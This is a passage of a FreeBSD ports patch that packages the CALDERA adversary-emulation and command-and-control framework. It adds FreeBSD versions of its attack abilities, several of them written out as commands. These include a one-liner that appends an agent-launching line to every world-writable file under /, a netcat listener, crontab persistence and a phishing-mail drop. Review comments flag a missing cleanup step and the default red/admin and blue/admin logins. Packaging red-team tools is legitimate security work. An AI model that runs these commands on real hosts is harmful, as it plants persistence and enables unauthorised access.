+--- plugins/stockpile/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml.orig 2022-09-14 02:24:22 UTC
++++ plugins/stockpile/data/abilities/privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml
+@@ -18,3 +18,9 @@
+ find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF "54NDC47_SCRIPT" "{}" || echo "#54NDC47_SCRIPT\n" "chmod +x sandcat.go-linux && sandcat.go-linux" >> "{}"; ls "{}" ' \; | echo "complete"
+ payloads:
+ - sandcat.go
++ freebsd:
++ sh:
++ command: |
++ find / -type f -size -500k -maxdepth 5 -perm -333 2>/dev/null -exec sh -c 'grep -qF "54NDC47_SCRIPT" "{}" || echo "#54NDC47_SCRIPT\n" "chmod +x sandcat.go-freebsd && sandcat.go-freebsd" >> "{}"; ls "{}" ' \; | echo "complete"
++ payloads:
++ - sandcat.go
diff --git a/security/caldera/files/patch-plugins_training_data_abilities_training_18702cd3-8e98-4eb7-99d4-0d2816926af1.yml b/security/caldera/files/patch-plugins_training_data_abilities_training_18702cd3-8e98-4eb7-99d4-0d2816926af1.yml
new file mode 100644
index 000000000000..6ff46df63b9c
--- /dev/null
+++ b/security/caldera/files/patch-plugins_training_data_abilities_training_18702cd3-8e98-4eb7-99d4-0d2816926af1.yml
@@ -0,0 +1,11 @@
+--- plugins/training/data/abilities/training/18702cd3-8e98-4eb7-99d4-0d2816926af1.yml.orig 2022-08-08 23:35:27 UTC
++++ plugins/training/data/abilities/training/18702cd3-8e98-4eb7-99d4-0d2816926af1.yml
+@@ -7,7 +7,7 @@
+ name: x
+ repeatable: False
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ touch ~/.bashrc;
diff --git a/security/caldera/files/patch-plugins_training_data_abilities_training_6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml b/security/caldera/files/patch-plugins_training_data_abilities_training_6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml
new file mode 100644
index 000000000000..48a3bc429da0
--- /dev/null
+++ b/security/caldera/files/patch-plugins_training_data_abilities_training_6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml
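Review bot: The new `freebsd` executor in privilege-escalation/10681f2f-be03-44af-858d-f2b0812df185.yml appends a tagged line to every file its `find /` expression matches but defines no `cleanup:` key, so hosts used for an exercise keep those modifications after the operation ends. Add a `cleanup:` entry that removes the lines carrying the `54NDC47_SCRIPT` marker from the files the command touched, in the same way the lateral-movement abilities in this commit pair their `command:` with a `cleanup:`. The context line above the added block has the same shape, so the gap appears to be inherited from the existing executor rather than introduced here. Only this hunk of the ability file is visible, so confirm no cleanup is defined elsewhere in it.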
@@ -0,0 +1,17 @@
+--- plugins/training/data/abilities/training/6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml.orig 2022-08-08 23:35:27 UTC
++++ plugins/training/data/abilities/training/6d53c4a8-ecd3-4131-a7a2-704a5b43dd83.yml
+@@ -7,11 +7,11 @@
+ attack_id: x
+ name: x
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ nc -nlv 7011 &
+ darwin:
+ sh:
+ command: |
+- nc -nlv 7011 &
+\ No newline at end of file
++ nc -nlv 7011 &
diff --git a/security/caldera/files/patch-plugins_training_data_abilities_training_e13c4e45-d19f-440e-8a72-fad728a1789c.yml b/security/caldera/files/patch-plugins_training_data_abilities_training_e13c4e45-d19f-440e-8a72-fad728a1789c.yml
new file mode 100644
index 000000000000..9213235c7428
--- /dev/null
+++ b/security/caldera/files/patch-plugins_training_data_abilities_training_e13c4e45-d19f-440e-8a72-fad728a1789c.yml
@@ -0,0 +1,13 @@
+--- plugins/training/data/abilities/training/e13c4e45-d19f-440e-8a72-fad728a1789c.yml.orig 2022-08-08 23:35:27 UTC
++++ plugins/training/data/abilities/training/e13c4e45-d19f-440e-8a72-fad728a1789c.yml
+@@ -7,7 +7,7 @@
+ attack_id: x
+ name: x
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+- rm -f /var/mail/victim
+\ No newline at end of file
++ rm -f /var/mail/victim
diff --git a/security/caldera/files/patch-plugins_training_data_abilities_training_f0d77555-fa79-4884-8afd-73d39f887879.yml b/security/caldera/files/patch-plugins_training_data_abilities_training_f0d77555-fa79-4884-8afd-73d39f887879.yml
new file mode 100644
index 000000000000..3861a5c894b6
--- /dev/null
+++ b/security/caldera/files/patch-plugins_training_data_abilities_training_f0d77555-fa79-4884-8afd-73d39f887879.yml
@@ -0,0 +1,15 @@
+--- plugins/training/data/abilities/training/f0d77555-fa79-4884-8afd-73d39f887879.yml.orig 2022-08-08 23:35:27 UTC
++++ plugins/training/data/abilities/training/f0d77555-fa79-4884-8afd-73d39f887879.yml
+@@ -7,9 +7,9 @@
+ attack_id: x
+ name: x
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ mv ./phish_email.txt /var/mail/victim
+ payloads:
+- - phish_email.txt
+\ No newline at end of file
++ - phish_email.txt
diff --git a/security/caldera/files/patch-plugins_training_data_abilities_training_fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml b/security/caldera/files/patch-plugins_training_data_abilities_training_fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml
new file mode 100644
index 000000000000..114e8f3ba003
--- /dev/null
+++ b/security/caldera/files/patch-plugins_training_data_abilities_training_fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml
@@ -0,0 +1,18 @@
+--- plugins/training/data/abilities/training/fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml.orig 2022-08-08 23:35:27 UTC
++++ plugins/training/data/abilities/training/fc4715ac-758e-4ba9-9e52-d07ff3d22a74.yml
+@@ -7,7 +7,7 @@
+ attack_id: x
+ name: x
+ platforms:
+- linux:
++ freebsd,linux:
+ sh:
+ command: |
+ crontab -l > new_crontab;
+@@ -26,4 +26,4 @@
+ command: |
+ $action = New-ScheduledTaskAction -Execute "calc.exe";
+ $trigger = New-ScheduledTaskTrigger -Daily -At 9am;
+- Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "FindMe" -Description "Pretend malicious scheduled action";
+\ No newline at end of file
++ Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "FindMe" -Description "Pretend malicious scheduled action";
diff --git a/security/caldera/files/patch-templates_abilities.html b/security/caldera/files/patch-templates_abilities.html
new file mode 100644
index 000000000000..1a74bbb85a5a
--- /dev/null
+++ b/security/caldera/files/patch-templates_abilities.html
@@ -0,0 +1,11 @@
+--- templates/abilities.html.orig 2022-09-17 15:28:09 UTC
++++ templates/abilities.html
+@@ -103,7 +103,7 @@
+ <p class="platforms">
+ <template x-for="platform of getAbilityPlatforms(ability)">
+ <span class="has-tooltip-arrow has-tooltip-left no-underline" x-bind:data-tooltip="platform">
+- <span class="icon is-small"><i class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'"></i></span>
++ <span class="icon is-small"><i class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'; else if (platform.includes('freebsd')) return 'fa-freebsd'"></i></span>
+ </span>
+ </template>
+ </p>
diff --git a/security/caldera/files/patch-templates_adversaries.html b/security/caldera/files/patch-templates_adversaries.html
new file mode 100644
index 000000000000..4ca0e76f1816
--- /dev/null
+++ b/security/caldera/files/patch-templates_adversaries.html
@@ -0,0 +1,20 @@
+--- templates/adversaries.html.orig 2022-09-17 15:28:09 UTC
++++ templates/adversaries.html
+@@ -143,7 +143,7 @@
+ <td x-show="undefinedAbilities.indexOf(ability.ability_id)">
+ <template x-for="platform of getExecutorDetail('platforms', ability)">
+ <span class="has-tooltip-arrow no-underline" x-bind:data-tooltip="platform">
+- <span class="icon is-small"><em class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'"></em></span>
++ <span class="icon is-small"><em class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'; else if (platform.includes('freebsd')) return 'fa-freebsd'"></em></span>
+ </span>
+ </template>
+ </td>
+@@ -262,7 +262,7 @@
+ <b x-text="ability.name"></b> |
+ <span x-text="ability.tactic"></span> |
+ <template x-for="platform of getExecutorDetail('platforms', ability)">
+- <span class="icon is-small"><em class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'"></em></span>
++ <span class="icon is-small"><em class="fab" x-bind:class="if (platform.includes('windows')) return 'fa-windows'; else if (platform.includes('darwin')) return 'fa-apple'; else if (platform.includes('linux')) return 'fa-linux'; else if (platform.includes('freebsd')) return 'fa-freebsd'"></em></span>
+ </template> |
+ <span class="icon is-small" x-show="getExecutorDetail('requirements', ability)"><em class="fas fa-lock"></em></span>
+ <span class="icon is-small" x-show="getExecutorDetail('cleanup', ability)"><em class="fas fa-trash"></em></span>
diff --git a/security/caldera/files/patch-templates_agents.html b/security/caldera/files/patch-templates_agents.html
new file mode 100644
index 000000000000..82828a0e9756
--- /dev/null
+++ b/security/caldera/files/patch-templates_agents.html
@@ -0,0 +1,32 @@
+--- templates/agents.html.orig 2022-09-17 15:28:09 UTC
++++ templates/agents.html
+@@ -143,6 +143,11 @@
+ <span class="icon is-large"><i class="fab fa-2x fa-apple"></i></span>
+ <br> darwin
+ </div>
++ <div class="has-text-centered platform" x-bind:class="{ 'selected': selectedPlatform === 'freebsd' }" x-show="platforms.includes('freebsd')" @click="changePlatform('freebsd')">
++ <span class="icon is-large"><i class="fab fa-2x fa-freebsd"></i></span>
++ <br> freebsd
++ </div>
++
+ </div>
+ </div>
+ </form>
+@@ -174,7 +179,7 @@
+ <div class="tags are-medium has-addons">
+ <span class="tag is-black">
+ <span class="icon">
+- <i class="fab" x-bind:class="{ 'fa-windows': command.platform === 'windows', 'fa-linux': command.platform === 'linux', 'fa-apple': command.platform === 'darwin' }"></i>
++ <i class="fab" x-bind:class="{ 'fa-windows': command.platform === 'windows', 'fa-linux': command.platform === 'linux', 'fa-apple': command.platform === 'darwin', 'fa-freebsd': command.platform === 'freebsd' }"></i>
+ </span>
+ </span>
+ <span class="tag is-dark" x-text="command.executor"></span>
+@@ -193,7 +198,7 @@
+ <div class="tags are-medium has-addons">
+ <span class="tag is-black">
+ <span class="icon">
+- <i class="fab" x-bind:class="{ 'fa-windows': command.platform === 'windows', 'fa-linux': command.platform === 'linux', 'fa-apple': command.platform === 'darwin' }"></i>
++ <i class="fab" x-bind:class="{ 'fa-windows': command.platform === 'windows', 'fa-linux': command.platform === 'linux', 'fa-apple': command.platform === 'darwin', 'fa-freebsd': command.platform === 'freebsd' }"></i>
+ </span>
+ </span>
+ <span class="tag is-dark" x-text="command.executor"></span>
diff --git a/security/caldera/files/pkg-message.in b/security/caldera/files/pkg-message.in
new file mode 100644
index 000000000000..f97eaf3e8be7
--- /dev/null
+++ b/security/caldera/files/pkg-message.in
@@ -0,0 +1,53 @@
+[
+{ type: install
+ message: <<EOM
+Caldera port were installed
+
+1) Take on mind it is a modifying version of Caldera for include FreeBSD as
+ supported OS and you could found some issues. Problem reports are welcome.
+
+2) Add the following lines to /etc/rc.conf
+
+ # sysrc caldera_enable="YES"
+
+3) Before of start Caldera you must run some scripts for generate/update payload
+ files
+
+ # cd %%WWWDIR%%/plugins/manx && sh update-shells.sh
+ # cd %%WWWDIR%%/plugins/sandcat && sh update-agents.sh
+
+4) Do not forget modify configuration files before of run Caldera. For default
+ it runs in insecure mode (http). Caldera configuration files are located at
+
+ %%WWWDIR%%/conf
+
+5) If you want run it in secure mode (https) take a look in ssl plugin section:
+
+ https://caldera.readthedocs.io/en/latest/Plugin-library.html#ssl
+
+6) Start Caldera service
+
+ # service caldera start
+
+7) When Caldera is starting, atomic plugin will use git to download files from
+ the following link:
+
+ https://github.com/redcanaryco/atomic-red-team
+
+ Those files are necessary for generate yml files used by Caldera abilities
+
+8) Caldera web listens on port 8888 by default and it uses red/admin or
+ blue/admin like user/password.
+
+ http://your_caldera_server_ip:8888
+
+9) Log file is located at /var/log/caldera.log
+
+10) For more configure information you can look at the following link:
+
+ https://caldera.readthedocs.io/en/latest/
+
+11) Enjoy it
+EOM
+}
+]
diff --git a/security/caldera/pkg-descr b/security/caldera/pkg-descr
new file mode 100644
index 000000000000..462121a2708e
--- /dev/null
+++ b/security/caldera/pkg-descr
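Review bot: Step 8 of pkg-message.in announces the web login as `red/admin` or `blue/admin` and step 4 says the service runs over plain http by default, yet no step tells the administrator to change those credentials or restrict the listener before step 6 starts the service. The package description calls this a command-and-control server, so a reachable instance with the published login is a serious exposure. Add an explicit step ahead of `service caldera start`, for example `Change the default user passwords under %%WWWDIR%%/conf before the first start and do not expose port 8888 to untrusted networks.` Which file under `%%WWWDIR%%/conf` holds the accounts is not shown in this hunk, so name it in the message once confirmed.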
@@ -0,0 +1,14 @@
+CALDERA a cyber security platform designed to easily automate adversary
+emulation, assist manual red-teams, and automate incident response.
+
+It is built on the MITRE ATT&CK framework and is an active research project
+at MITRE.
+
+The framework consists of two components:
+
+- The core system. This is the framework code, consisting of what is available
+ in this repository. Included is an asynchronous command-and-control (C2)
+ server with a REST API and a web interface.
+- Plugins. These repositories expand the core framework capabilities and
+ providing additional functionality. Examples include agents, reporting,
+ collections of TTPs and more.
diff --git a/security/caldera/pkg-plist b/security/caldera/pkg-plist
new file mode 100644
index 000000000000..ab4dc204a75c
--- /dev/null
+++ b/security/caldera/pkg-plist
@@ -0,0 +1,1283 @@ +@mode 640 +@owner www +@group www +%%WWWDIR%%/CONTRIBUTING.md +%%WWWDIR%%/LICENSE +%%WWWDIR%%/README.md +%%WWWDIR%%/SECURITY.md +%%WWWDIR%%/app/__init__.py +%%WWWDIR%%/app/api/packs/advanced.py +%%WWWDIR%%/app/api/packs/campaign.py +%%WWWDIR%%/app/api/rest_api.py +%%WWWDIR%%/app/api/v2/__init__.py +%%WWWDIR%%/app/api/v2/errors.py +%%WWWDIR%%/app/api/v2/handlers/ability_api.py +%%WWWDIR%%/app/api/v2/handlers/adversary_api.py +%%WWWDIR%%/app/api/v2/handlers/agent_api.py +%%WWWDIR%%/app/api/v2/handlers/base_api.py +%%WWWDIR%%/app/api/v2/handlers/base_object_api.py +%%WWWDIR%%/app/api/v2/handlers/config_api.py +%%WWWDIR%%/app/api/v2/handlers/contact_api.py +%%WWWDIR%%/app/api/v2/handlers/fact_api.py +%%WWWDIR%%/app/api/v2/handlers/fact_source_api.py +%%WWWDIR%%/app/api/v2/handlers/health_api.py +%%WWWDIR%%/app/api/v2/handlers/obfuscator_api.py +%%WWWDIR%%/app/api/v2/handlers/objective_api.py +%%WWWDIR%%/app/api/v2/handlers/operation_api.py +%%WWWDIR%%/app/api/v2/handlers/planner_api.py +%%WWWDIR%%/app/api/v2/handlers/plugins_api.py +%%WWWDIR%%/app/api/v2/handlers/schedule_api.py +%%WWWDIR%%/app/api/v2/managers/ability_api_manager.py +%%WWWDIR%%/app/api/v2/managers/adversary_api_manager.py +%%WWWDIR%%/app/api/v2/managers/agent_api_manager.py +%%WWWDIR%%/app/api/v2/managers/base_api_manager.py +%%WWWDIR%%/app/api/v2/managers/config_api_manager.py +%%WWWDIR%%/app/api/v2/managers/contact_api_manager.py +%%WWWDIR%%/app/api/v2/managers/fact_api_manager.py +%%WWWDIR%%/app/api/v2/managers/operation_api_manager.py +%%WWWDIR%%/app/api/v2/managers/schedule_api_manager.py +%%WWWDIR%%/app/api/v2/responses.py +%%WWWDIR%%/app/api/v2/schemas/base_schemas.py +%%WWWDIR%%/app/api/v2/schemas/caldera_info_schemas.py +%%WWWDIR%%/app/api/v2/schemas/config_schemas.py +%%WWWDIR%%/app/api/v2/schemas/deploy_command_schemas.py +%%WWWDIR%%/app/api/v2/schemas/error_schemas.py +%%WWWDIR%%/app/api/v2/security.py +%%WWWDIR%%/app/api/v2/validation.py 
+%%WWWDIR%%/app/contacts/contact_dns.py +%%WWWDIR%%/app/contacts/contact_ftp.py +%%WWWDIR%%/app/contacts/contact_gist.py +%%WWWDIR%%/app/contacts/contact_html.py +%%WWWDIR%%/app/contacts/contact_http.py +%%WWWDIR%%/app/contacts/contact_slack.py +%%WWWDIR%%/app/contacts/contact_tcp.py +%%WWWDIR%%/app/contacts/contact_udp.py +%%WWWDIR%%/app/contacts/contact_websocket.py +%%WWWDIR%%/app/contacts/handles/h_beacon.py +%%WWWDIR%%/app/contacts/tunnels/tunnel_ssh.py +%%WWWDIR%%/app/data_encoders/base64_basic.py +%%WWWDIR%%/app/data_encoders/plain_text.py +%%WWWDIR%%/app/learning/p_ip.py +%%WWWDIR%%/app/learning/p_path.py +%%WWWDIR%%/app/objects/c_ability.py +%%WWWDIR%%/app/objects/c_adversary.py +%%WWWDIR%%/app/objects/c_agent.py +%%WWWDIR%%/app/objects/c_data_encoder.py +%%WWWDIR%%/app/objects/c_obfuscator.py +%%WWWDIR%%/app/objects/c_objective.py +%%WWWDIR%%/app/objects/c_operation.py +%%WWWDIR%%/app/objects/c_planner.py +%%WWWDIR%%/app/objects/c_plugin.py +%%WWWDIR%%/app/objects/c_schedule.py +%%WWWDIR%%/app/objects/c_source.py +%%WWWDIR%%/app/objects/interfaces/i_object.py +%%WWWDIR%%/app/objects/secondclass/c_executor.py +%%WWWDIR%%/app/objects/secondclass/c_fact.py +%%WWWDIR%%/app/objects/secondclass/c_goal.py +%%WWWDIR%%/app/objects/secondclass/c_instruction.py +%%WWWDIR%%/app/objects/secondclass/c_link.py +%%WWWDIR%%/app/objects/secondclass/c_parser.py +%%WWWDIR%%/app/objects/secondclass/c_parserconfig.py +%%WWWDIR%%/app/objects/secondclass/c_relationship.py +%%WWWDIR%%/app/objects/secondclass/c_requirement.py +%%WWWDIR%%/app/objects/secondclass/c_result.py +%%WWWDIR%%/app/objects/secondclass/c_rule.py +%%WWWDIR%%/app/objects/secondclass/c_variation.py +%%WWWDIR%%/app/objects/secondclass/c_visibility.py +%%WWWDIR%%/app/service/app_svc.py +%%WWWDIR%%/app/service/auth_svc.py +%%WWWDIR%%/app/service/contact_svc.py +%%WWWDIR%%/app/service/data_svc.py +%%WWWDIR%%/app/service/event_svc.py +%%WWWDIR%%/app/service/file_svc.py +%%WWWDIR%%/app/service/interfaces/i_app_svc.py 
+%%WWWDIR%%/app/service/interfaces/i_auth_svc.py +%%WWWDIR%%/app/service/interfaces/i_contact_svc.py +%%WWWDIR%%/app/service/interfaces/i_data_svc.py +%%WWWDIR%%/app/service/interfaces/i_event_svc.py +%%WWWDIR%%/app/service/interfaces/i_file_svc.py +%%WWWDIR%%/app/service/interfaces/i_knowledge_svc.py +%%WWWDIR%%/app/service/interfaces/i_learning_svc.py +%%WWWDIR%%/app/service/interfaces/i_login_handler.py +%%WWWDIR%%/app/service/interfaces/i_object_svc.py +%%WWWDIR%%/app/service/interfaces/i_planning_svc.py +%%WWWDIR%%/app/service/interfaces/i_rest_svc.py +%%WWWDIR%%/app/service/knowledge_svc.py +%%WWWDIR%%/app/service/learning_svc.py +%%WWWDIR%%/app/service/login_handlers/default.py +%%WWWDIR%%/app/service/planning_svc.py +%%WWWDIR%%/app/service/rest_svc.py +%%WWWDIR%%/app/utility/base_knowledge_svc.py +%%WWWDIR%%/app/utility/base_obfuscator.py +%%WWWDIR%%/app/utility/base_object.py +%%WWWDIR%%/app/utility/base_parser.py +%%WWWDIR%%/app/utility/base_planning_svc.py +%%WWWDIR%%/app/utility/base_service.py +%%WWWDIR%%/app/utility/base_world.py +%%WWWDIR%%/app/utility/config_generator.py +%%WWWDIR%%/app/utility/file_decryptor.py +%%WWWDIR%%/app/utility/payload_encoder.py +%%WWWDIR%%/app/utility/rule_set.py +%%WWWDIR%%/app/version.py +%%WWWDIR%%/conf/agents.yml +%%WWWDIR%%/conf/default.yml +%%WWWDIR%%/conf/payloads.yml +%%WWWDIR%%/conf/ssh_keys/.gitignore +%%WWWDIR%%/data/abilities/.gitkeep +%%WWWDIR%%/data/adversaries/.gitkeep +%%WWWDIR%%/data/backup/.gitkeep +%%WWWDIR%%/data/objectives/.gitkeep +%%WWWDIR%%/data/payloads/.gitkeep +%%WWWDIR%%/data/results/.gitkeep +%%WWWDIR%%/data/sources/.gitkeep +%%WWWDIR%%/docker-compose.yml +%%WWWDIR%%/package-lock.json +%%WWWDIR%%/package.json +%%WWWDIR%%/plugins/access/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/access/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/access/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/access/.github/ISSUE_TEMPLATE/question.md 
+%%WWWDIR%%/plugins/access/.github/pull_request_template.md +%%WWWDIR%%/plugins/access/.gitignore +%%WWWDIR%%/plugins/access/README.md +%%WWWDIR%%/plugins/access/VERSION.txt +%%WWWDIR%%/plugins/access/app/access_api.py +%%WWWDIR%%/plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml +%%WWWDIR%%/plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml +%%WWWDIR%%/plugins/access/data/payload/90ef8eaa-01b7-4e98-9070-105eca3bac39.yml +%%WWWDIR%%/plugins/access/data/payloads/msf_extract.rc +%%WWWDIR%%/plugins/access/data/payloads/scanner.sh +%%WWWDIR%%/plugins/access/hook.py +%%WWWDIR%%/plugins/access/static/.gitkeep +%%WWWDIR%%/plugins/access/templates/access.html +%%WWWDIR%%/plugins/atomic/.flake8 +%%WWWDIR%%/plugins/atomic/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/atomic/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/atomic/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/atomic/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/atomic/.github/pull_request_template.md +%%WWWDIR%%/plugins/atomic/.github/workflows/testing.yml +%%WWWDIR%%/plugins/atomic/.gitignore +%%WWWDIR%%/plugins/atomic/.pre-commit-config.yaml +%%WWWDIR%%/plugins/atomic/LICENSE +%%WWWDIR%%/plugins/atomic/README.md +%%WWWDIR%%/plugins/atomic/VERSION.txt +%%WWWDIR%%/plugins/atomic/app/atomic_gui.py +%%WWWDIR%%/plugins/atomic/app/atomic_svc.py +%%WWWDIR%%/plugins/atomic/app/parsers/atomic_powershell.py +%%WWWDIR%%/plugins/atomic/data/.gitkeep +%%WWWDIR%%/plugins/atomic/hook.py +%%WWWDIR%%/plugins/atomic/payloads/.gitkeep +%%WWWDIR%%/plugins/atomic/templates/atomic.html +%%WWWDIR%%/plugins/atomic/tests/.gitkeep +%%WWWDIR%%/plugins/atomic/tests/test_atomic_svc.py +%%WWWDIR%%/plugins/atomic/tox.ini +%%WWWDIR%%/plugins/builder/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/builder/.github/ISSUE_TEMPLATE/config.yml 
+%%WWWDIR%%/plugins/builder/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/builder/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/builder/.github/pull_request_template.md +%%WWWDIR%%/plugins/builder/.gitignore +%%WWWDIR%%/plugins/builder/README.md +%%WWWDIR%%/plugins/builder/VERSION.txt +%%WWWDIR%%/plugins/builder/app/build_svc.py +%%WWWDIR%%/plugins/builder/app/builder_gui.py +%%WWWDIR%%/plugins/builder/build/.gitkeep +%%WWWDIR%%/plugins/builder/conf/environments.yml +%%WWWDIR%%/plugins/builder/hook.py +%%WWWDIR%%/plugins/builder/install.sh +%%WWWDIR%%/plugins/builder/payloads/.gitkeep +%%WWWDIR%%/plugins/builder/requirements.txt +%%WWWDIR%%/plugins/builder/templates/builder.html +%%WWWDIR%%/plugins/compass/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/compass/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/compass/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/compass/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/compass/.github/pull_request_template.md +%%WWWDIR%%/plugins/compass/.gitignore +%%WWWDIR%%/plugins/compass/README.md +%%WWWDIR%%/plugins/compass/VERSION.txt +%%WWWDIR%%/plugins/compass/app/compass_svc.py +%%WWWDIR%%/plugins/compass/hook.py +%%WWWDIR%%/plugins/compass/templates/compass.html +%%WWWDIR%%/plugins/debrief/.flake8 +%%WWWDIR%%/plugins/debrief/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/debrief/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/debrief/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/debrief/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/debrief/.github/pull_request_template.md +%%WWWDIR%%/plugins/debrief/.gitignore +%%WWWDIR%%/plugins/debrief/README.md +%%WWWDIR%%/plugins/debrief/VERSION.txt +%%WWWDIR%%/plugins/debrief/app/debrief-sections/agents.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/attackpath_graph.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/fact_graph.py 
+%%WWWDIR%%/plugins/debrief/app/debrief-sections/facts_table.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/main_summary.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/statistics.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/steps_graph.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/steps_table.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/tactic_graph.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/tactic_technique_table.py +%%WWWDIR%%/plugins/debrief/app/debrief-sections/technique_graph.py +%%WWWDIR%%/plugins/debrief/app/debrief_gui.py +%%WWWDIR%%/plugins/debrief/app/debrief_svc.py +%%WWWDIR%%/plugins/debrief/app/objects/c_story.py +%%WWWDIR%%/plugins/debrief/app/utility/base_report_section.py +%%WWWDIR%%/plugins/debrief/conf/default.yml +%%WWWDIR%%/plugins/debrief/docs/debrief1.png +%%WWWDIR%%/plugins/debrief/docs/debrief2.png +%%WWWDIR%%/plugins/debrief/docs/debrief3.png +%%WWWDIR%%/plugins/debrief/docs/debrief_2020-09-14_16-03-43.pdf +%%WWWDIR%%/plugins/debrief/downloads/.gitkeep +%%WWWDIR%%/plugins/debrief/hook.py +%%WWWDIR%%/plugins/debrief/requirements.txt +%%WWWDIR%%/plugins/debrief/static/css/debrief.css +%%WWWDIR%%/plugins/debrief/static/img/access.svg +%%WWWDIR%%/plugins/debrief/static/img/caldera.png +%%WWWDIR%%/plugins/debrief/static/img/cloud.svg +%%WWWDIR%%/plugins/debrief/static/img/collection.svg +%%WWWDIR%%/plugins/debrief/static/img/commandcontrol.svg +%%WWWDIR%%/plugins/debrief/static/img/credaccess.svg +%%WWWDIR%%/plugins/debrief/static/img/darwin.svg +%%WWWDIR%%/plugins/debrief/static/img/debrief.jpg +%%WWWDIR%%/plugins/debrief/static/img/defevasion.svg +%%WWWDIR%%/plugins/debrief/static/img/discovery.svg +%%WWWDIR%%/plugins/debrief/static/img/execution.svg +%%WWWDIR%%/plugins/debrief/static/img/exfil.svg +%%WWWDIR%%/plugins/debrief/static/img/impact.svg +%%WWWDIR%%/plugins/debrief/static/img/latmove.svg +%%WWWDIR%%/plugins/debrief/static/img/link.svg +%%WWWDIR%%/plugins/debrief/static/img/linux.svg 
+%%WWWDIR%%/plugins/debrief/static/img/operation.svg +%%WWWDIR%%/plugins/debrief/static/img/persistence.svg +%%WWWDIR%%/plugins/debrief/static/img/privesc.svg +%%WWWDIR%%/plugins/debrief/static/img/star.svg +%%WWWDIR%%/plugins/debrief/static/img/tactic.svg +%%WWWDIR%%/plugins/debrief/static/img/technique.svg +%%WWWDIR%%/plugins/debrief/static/img/unknown.svg +%%WWWDIR%%/plugins/debrief/static/img/windows.svg +%%WWWDIR%%/plugins/debrief/static/js/d3-zoom.v1.min.js +%%WWWDIR%%/plugins/debrief/static/js/d3.v4.min.js +%%WWWDIR%%/plugins/debrief/static/js/graph.js +%%WWWDIR%%/plugins/debrief/templates/debrief.html +%%WWWDIR%%/plugins/debrief/uploads/.gitkeep +%%WWWDIR%%/plugins/debrief/uploads/header-logos/.gitkeep +%%WWWDIR%%/plugins/emu/.flake8 +%%WWWDIR%%/plugins/emu/.github/ISSUE_TEMPLATE/bug_report.md +%%WWWDIR%%/plugins/emu/.github/ISSUE_TEMPLATE/config.yml +%%WWWDIR%%/plugins/emu/.github/ISSUE_TEMPLATE/feature_request.md +%%WWWDIR%%/plugins/emu/.github/ISSUE_TEMPLATE/question.md +%%WWWDIR%%/plugins/emu/.github/pull_request_template.md +%%WWWDIR%%/plugins/emu/.github/workflows/testing.yml +%%WWWDIR%%/plugins/emu/.gitignore +%%WWWDIR%%/plugins/emu/.pre-commit-config.yaml +%%WWWDIR%%/plugins/emu/LICENSE +%%WWWDIR%%/plugins/emu/README.md +%%WWWDIR%%/plugins/emu/app/emu_gui.py +%%WWWDIR%%/plugins/emu/app/emu_svc.py +%%WWWDIR%%/plugins/emu/app/group_filtered_planner.py +%%WWWDIR%%/plugins/emu/app/parsers/vssadmin_shadow.py 